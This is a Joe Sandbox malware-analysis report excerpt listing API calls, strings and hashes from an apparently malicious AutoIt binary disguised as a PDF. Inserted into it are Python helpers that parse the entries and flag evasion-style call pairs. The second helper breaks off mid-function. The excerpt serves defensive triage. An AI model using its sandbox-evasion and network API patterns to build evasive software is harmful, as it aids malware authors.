• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: _memmove
• String ID: Oav
• API String ID: 4104443479-1091017984
• Opcode ID: 19178e50488fbb08f91eeb693d950218bd125f812b4a0af14f077349043ee815
• Instruction ID: 377a5864d7a163cbd5b02aee29dc58c01efeb03546544f70fd4144da69e5598b
• Opcode Fuzzy Hash: 19178e50488fbb08f91eeb693d950218bd125f812b4a0af14f077349043ee815
• Instruction Fuzzy Hash: 3A5150B0900609DFCF64CF68D884AAEBBF1FF45304F14852AE85AD7350EB39A955CB51
APIs
• Sleep.KERNEL32(00000000), ref: 00762AC8
• GlobalMemoryStatusEx.KERNEL32(?), ref: 00762AE1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
• Opcode ID: b88dacca66b384dd313bfb705c0d96fa083d94af6ef8eace7dfab5221100898c
• Instruction ID: c10478231e65e06d0dedd026042e2cedee2f0d4663ce11b89d5d79a0f2cea47f
• Opcode Fuzzy Hash: b88dacca66b384dd313bfb705c0d96fa083d94af6ef8eace7dfab5221100898c
• Instruction Fuzzy Hash: B5515871418745DBD320AF10D88ABABBBE8FF84311F42885DF6E9510A1DB798529CB26
APIs
  • Part of subcall function 0075506B: __fread_nolock.LIBCMT ref: 00755089
• _wcscmp.LIBCMT ref: 007B9AAE
• _wcscmp.LIBCMT ref: 007B9AC1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: _wcscmp$__fread_nolock
• String ID: FILE
• API String ID: 4029003684-3121273764
• Opcode ID: f07f05e72fda78fcef589da2da584058933d540d8a8c8b6adaad8e5138ad9055
• Instruction ID: 76132c69fbd74f36d0057e811895a6b5be4293d0c69e8b7a774a565e0619c552
• Opcode Fuzzy Hash: f07f05e72fda78fcef589da2da584058933d540d8a8c8b6adaad8e5138ad9055
• Instruction Fuzzy Hash: B641B871A00659FADF20AAA4DC49FEFB7B9DF45710F004069BA14A71C1D6B99A0487A1
APIs
• _memset.LIBCMT ref: 007C2892
• InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 007C28C8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: CrackInternet_memset
• String ID: |
• API String ID: 1413715105-2343686810
• Opcode ID: 95ea1a0e4ae90e4f0a83ceb6f4b5f3edc34070478d361a5dde5fc342d289447a
• Instruction ID: cfae493e9685a94a706f0f7823618325533a29209d4d443dc4383956f56bacb9
• Opcode Fuzzy Hash: 95ea1a0e4ae90e4f0a83ceb6f4b5f3edc34070478d361a5dde5fc342d289447a
• Instruction Fuzzy Hash: 00311971800119EBCF05EFA1DC89EEEBFB9FF08310F104029E815A6166DB756A56DBA0
APIs
• DestroyWindow.USER32(?,?,?,?), ref: 007D6D86
• MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 007D6DC2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: Window$DestroyMove
• String ID: static
• API String ID: 2139405536-2160076837
• Opcode ID: 9b71579761f729c11be477f196a88d85f59a8ffc6662b3281d121a1991bba740
• Instruction ID: b785b1260039b3c8498fbfa4b21cf37a2824e44aab7b9ee79ee51454222b7821
• Opcode Fuzzy Hash: 9b71579761f729c11be477f196a88d85f59a8ffc6662b3281d121a1991bba740
• Instruction Fuzzy Hash: 22319E71200204AEDF109F24DC84AFB77B9FF48720F10861AF9A697290DB79AC91DB64
APIs
• _memset.LIBCMT ref: 007B2E00
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007B2E3B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
• Opcode ID: fa05b3eae75e2aec7419b90c421621ff27b09494d2752eb7466ac5856687588a
• Instruction ID: 8d3ed3b4cb7c632cae3e02c08576932d6ba82ca300de9f334982ac9a4ac8dd7a
• Opcode Fuzzy Hash: fa05b3eae75e2aec7419b90c421621ff27b09494d2752eb7466ac5856687588a
• Instruction Fuzzy Hash: A6310631601305EBEB248F49C84DBEEBBB9FF45340F24402AE985D61A2E778D942CB51
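The entries above all follow one fixed plain-text layout (APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity), which makes them easy to turn into records for pivoting across samples or for triage. The following Python is an added example written for this page; it is not part of the Joe Sandbox report, its tooling, or the analysed sample. The field names are the report's own, the parsing rules and the `flag_sleep_memory_pairs` heuristic are my assumptions, and the embedded input is two entries abridged from this page (indentation and most Associated/hash lines removed).

```python
"""Parse the per-function metadata entries of a Joe Sandbox report.

Added example; it is not part of the Joe Sandbox report, its tooling, or the
analysed sample. Field names are the report's own; everything else is assumed.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed input: two entries abridged from this report (page indentation and
# most 'Associated'/hash lines dropped). A real report repeats this shape per function.
SAMPLE = """\
APIs
• Sleep.KERNEL32(00000000), ref: 00762AC8
• GlobalMemoryStatusEx.KERNEL32(?), ref: 00762AE1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
• Instruction Fuzzy Hash: B5515871418745DBD320AF10D88ABABBBE8FF84311F42885DF6E9510A1DB798529CB26
APIs
  • Part of subcall function 0076FEC6: _wcscpy.LIBCMT ref: 0076FEE9
• __wcsnicmp.LIBCMT ref: 007BB298
• WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 007BB361
Strings
Similarity
• API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
• String ID: LPT
• API String ID: 3222508074-1350329615
• Instruction Fuzzy Hash: E6614E75A00215EFCB14DF94C885EEEB7F4EB48310F15805AF946AB291DBB8AE44CB50
"""

SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")
# '• [Part of subcall function ADDR: ]Name.MODULE[(args)][,] ref: ADDR'
API_RE = re.compile(r"^•\s*(?:Part of subcall function ([0-9A-Fa-f]+):\s*)?"
                    r"(\w+)\.(\w+)(?:\(([^)]*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)\s*$")
KV_RE = re.compile(r"^•\s*([^:]+?):\s*(.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list                         # argument column as printed; '?' = unresolved
    ref: str                           # call-site address (hex string from the report)
    subcall_of: Optional[str] = None   # set when the call sits in a callee, not here


@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)
    associated: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)   # Similarity / dump metadata by name

    def api_names(self) -> set:
        return {a.name for a in self.apis}


def parse_entries(text: str) -> list:
    entries, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            # A new entry starts at 'APIs', or at 'Strings' when no 'APIs' preceded it
            # (entries with no resolved API calls omit the APIs section).
            if line == "APIs" or (line == "Strings" and section != "APIs"):
                entries.append(FunctionEntry())
            section = line
            continue
        if not entries:
            continue
        cur = entries[-1]
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                sub, name, module, args, ref = m.groups()
                cur.apis.append(ApiCall(name, module, args.split(",") if args else [], ref, sub))
            continue
        m = KV_RE.match(line)
        if m and m.group(1) == "Associated":
            cur.associated.append(m.group(2))
        elif m:
            cur.fields[m.group(1)] = m.group(2)
    return entries


def index_by(entries: list, key: str) -> dict:
    """Group entries by a Similarity field (e.g. 'API String ID') for cross-sample pivots."""
    out = {}
    for e in entries:
        if e.fields.get(key):
            out.setdefault(e.fields[key], []).append(e)
    return out


def flag_sleep_memory_pairs(entries: list) -> list:
    """Functions calling both Sleep and GlobalMemoryStatusEx. Evasive code uses this
    pair to stall and size RAM before acting, but in a compiled AutoIt binary it may
    belong to the interpreter's runtime rather than the script: a triage pointer only."""
    wanted = {"Sleep", "GlobalMemoryStatusEx"}
    return [e for e in entries if wanted <= e.api_names()]
```

Run `parse_entries(SAMPLE)` and feed the result to `index_by(..., "API String ID")` to build a pivot table, or to `flag_sleep_memory_pairs` to list the functions worth opening first in the disassembly. The second entry in the sample starts a callee-only line with "Part of subcall function", so the parser keeps the `subcall_of` address rather than attributing that call to the function itself.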
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007D69D0
                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007D69DB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: MessageSend
• String ID: Combobox
• API String ID: 3850602802-2096851135
APIs
  • Part of subcall function 00751D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00751D73
  • Part of subcall function 00751D35: GetStockObject.GDI32(00000011), ref: 00751D87
  • Part of subcall function 00751D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00751D91
• GetWindowRect.USER32(00000000,?), ref: 007D6EE0
• GetSysColor.USER32(00000012), ref: 007D6EFA
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
• API String ID: 1983116058-2160076837
APIs
• GetWindowTextLengthW.USER32(00000000), ref: 007D6C11
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007D6C20
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: edit
• API String ID: 2978978980-2167791130
APIs
• _memset.LIBCMT ref: 007B2F11
• GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 007B2F30
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 007C2520
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 007C2549
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• API String ID: 942729171-4266983199
APIs
  • Part of subcall function 007C830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,007C80C8,?,00000000,?,?), ref: 007C8322
• inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 007C80CB
• htons.WSOCK32(00000000,?,00000000), ref: 007C8108
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: ByteCharMultiWidehtonsinet_addr
• String ID: 255.255.255.255
• API String ID: 2496851823-2422070025
APIs
  • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
  • Part of subcall function 007AB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 007AB0E7
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 007A9355
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
APIs
  • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
  • Part of subcall function 007AB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 007AB0E7
• SendMessageW.USER32(?,00000180,00000000,?), ref: 007A924D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
APIs
  • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
  • Part of subcall function 007AB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 007AB0E7
• SendMessageW.USER32(?,00000182,?,00000000), ref: 007A92D0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassMessageNameSend_memmove
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 372448540-1403004172
                                                                                                                      • Opcode ID: 7486a9b618f3f9da0088b00329129b29d958a05e36d5994e0d60debd25fe07da
                                                                                                                      • Instruction ID: 4867b89c836f9d2bd0abd6bed38d714f2f675b09a5b999a9e9db5389d33658b4
                                                                                                                      • Opcode Fuzzy Hash: 7486a9b618f3f9da0088b00329129b29d958a05e36d5994e0d60debd25fe07da
                                                                                                                      • Instruction Fuzzy Hash: 7501A271E41108B7CB04EAA0CD96EFF77ACAF52301F244215B912A32D2DA695E1C9271
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassName_wcscmp
                                                                                                                      • String ID: #32770
                                                                                                                      • API String ID: 2292705959-463685578
                                                                                                                      • Opcode ID: d1a53eff19a3a7ac5c333880e7f275643f7292e90ccc1e88faf7126a135b17b8
                                                                                                                      • Instruction ID: f4bf998b72775070663e485973eb7fb81fb11f425a0301d426978af4ae87ffa4
                                                                                                                      • Opcode Fuzzy Hash: d1a53eff19a3a7ac5c333880e7f275643f7292e90ccc1e88faf7126a135b17b8
                                                                                                                      • Instruction Fuzzy Hash: 32E02272A013282AE720AAA9AC49BE7FBACFB40771F00006BFD14D3040E5749A448BE0
                                                                                                                      APIs
                                                                                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 007A81CA
                                                                                                                        • Part of subcall function 00773598: _doexit.LIBCMT ref: 007735A2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Message_doexit
                                                                                                                      • String ID: AutoIt$Error allocating memory.
                                                                                                                      • API String ID: 1993061046-4017498283
                                                                                                                      • Opcode ID: d34cc199003475bb9270a8235d6f7577059c3e5e6b411ceea43ff4c3ef95b12a
                                                                                                                      • Instruction ID: 131193799971421e00805ecc27a335b4509cf0378d717a28d7f278d286da99f7
                                                                                                                      • Opcode Fuzzy Hash: d34cc199003475bb9270a8235d6f7577059c3e5e6b411ceea43ff4c3ef95b12a
                                                                                                                      • Instruction Fuzzy Hash: 66D0123238535872D65432A96C0BBC56A484B05B56F508016FB0C955D389DE999152ED
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0078B564: _memset.LIBCMT ref: 0078B571
                                                                                                                        • Part of subcall function 00770B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0078B540,?,?,?,0075100A), ref: 00770B89
                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,0075100A), ref: 0078B544
                                                                                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0075100A), ref: 0078B553
                                                                                                                      Strings
                                                                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0078B54E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                      • API String ID: 3158253471-631824599
                                                                                                                      • Opcode ID: 6e3bc9a06f1490edc3266605d9b03c39f223db690ac5b1855f3accfa9d92d60a
                                                                                                                      • Instruction ID: c371e23d9fd8f2faefc858c0e06646e575cce4450d35a536a75e850f26264fbe
                                                                                                                      • Opcode Fuzzy Hash: 6e3bc9a06f1490edc3266605d9b03c39f223db690ac5b1855f3accfa9d92d60a
                                                                                                                      • Instruction Fuzzy Hash: 2BE039B06003118BD720EF28E8083427BE4AB04755F04C92DE886C26A1E7BCE408CBA1
                                                                                                                      APIs
                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007D5BF5
                                                                                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 007D5C08
                                                                                                                        • Part of subcall function 007B54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007B555E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                      • API String ID: 529655941-2988720461
                                                                                                                      • Opcode ID: 091ea8cd9d51376169fc494ea4bc736856468463f69c29c44f728a56f031bf9f
                                                                                                                      • Instruction ID: a5e2a6f959efa799113e5c0697b287dd69f0f39e0319f28d92de14159d704a66
                                                                                                                      • Opcode Fuzzy Hash: 091ea8cd9d51376169fc494ea4bc736856468463f69c29c44f728a56f031bf9f
                                                                                                                      • Instruction Fuzzy Hash: 95D0C935389311B6E768AB70AC0FFD76B24AB00B51F044826F657AA1D0D9E89801C654
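Reading the function entries above by hand is slow, and two of them are easy to over-read: the IsDebuggerPresent / OutputDebugStringW pair is the ATL runtime's own CAtlBaseModule constructor (the "Unable to initialize critical section in CAtlBaseModule" text comes from atlcore.h), and the "Error allocating memory." MessageBoxW with the "AutoIt" caption is the AutoIt interpreter's out-of-memory handler; both ship inside every compiled AutoIt binary and say nothing about the script author's payload. The script below is an added triage helper, not part of the Joe Sandbox report or of its IDA plugin: it parses the "APIs" and "Strings" blocks in the format shown above, separates direct calls from "Part of subcall function" entries, decodes the handful of Win32 message and MessageBox constants that appear on this page (0x111 WM_COMMAND, 0x182 LB_DELETESTRING, 0x10 MB_ICONERROR; the 0x197 wParam is left as-is because the report gives it no name), and tags entries whose strings are runtime boilerplate so they can be deprioritised. The runtime-string list, the tag names and the sample excerpt (constructed from the four entries above) are assumptions of this example.

```python
"""Triage helper for the per-function "APIs" / "Strings" blocks of a Joe Sandbox
report (added example; not Joe Sandbox code). It parses the text format used in
the report, decodes a few documented Win32 constants, and flags entries whose
strings belong to the ATL / AutoIt runtime rather than to the sample's own logic."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Report line shape after the bullet:  Name.MODULE(arg,arg,...), ref: ADDR
# Sub-calls are prefixed with:         Part of subcall function ADDR: ...
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-F]+): )?"
    r"(?P<name>\w+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)$"
)

# Documented winuser.h values; decoded only at the argument position where the
# given API takes them, so an unrelated 0x10 elsewhere is not mislabelled.
MSG_NAMES = {"00000111": "WM_COMMAND", "00000182": "LB_DELETESTRING"}
MB_FLAGS = {"00000010": "MB_ICONERROR"}
ARG_DECODERS = {("SendMessageW", 1): MSG_NAMES, ("PostMessageW", 1): MSG_NAMES,
                ("MessageBoxW", 3): MB_FLAGS}

# Strings emitted by library code compiled into every AutoIt binary (assumed list;
# the first is from ATL's atlcore.h, the second from the AutoIt interpreter).
RUNTIME_STRINGS = (
    "Unable to initialize critical section in CAtlBaseModule",
    "Error allocating memory.",
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str
    caller: Optional[str] = None  # set when the report lists it as a sub-call


@dataclass
class FunctionEntry:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)


def parse_api_line(line: str) -> Optional[ApiCall]:
    m = API_RE.match(line.strip().lstrip("•").strip())
    if not m:
        return None
    raw = m.group("args")
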